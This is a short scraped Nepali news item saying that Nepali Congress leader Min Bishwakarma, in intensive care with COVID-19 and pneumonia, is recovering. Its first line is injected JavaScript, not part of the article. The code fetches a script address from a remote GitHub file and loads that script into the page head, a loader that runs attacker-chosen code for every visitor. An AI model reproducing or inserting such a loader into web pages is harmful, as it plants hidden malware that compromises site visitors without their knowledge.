;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
कात्तिक १५,
नेपाली कांग्रेसका नेता मीन विश्वकर्माको स्वास्थ्यमा सुधार भएको छ । छदिन अघि कोरोना संक्रमण पुष्टि भएर उपचाररत विश्वकर्मालाई आइसियूमा राखेर उपचार भैरहेको छ ।
उनको राजधानीस्थित ग्राण्डी अस्पतालको आइसियूमा उपचार भइरहेको छ । उनको स्वास्थ्यमा सुधार हुने थालेको उपचारमा संलग्न चिकित्सकहरुले बताएका छन् । उनलाई कोरोना संक्रमणसंगै फोक्सोमा निमोनिया भएको बताइएको छ ।
उनमा गत कात्तिक १ गते कोरोना संक्रमण देखिएको थियो। file Photo
फेसबुक प्रतिक्रियाहरु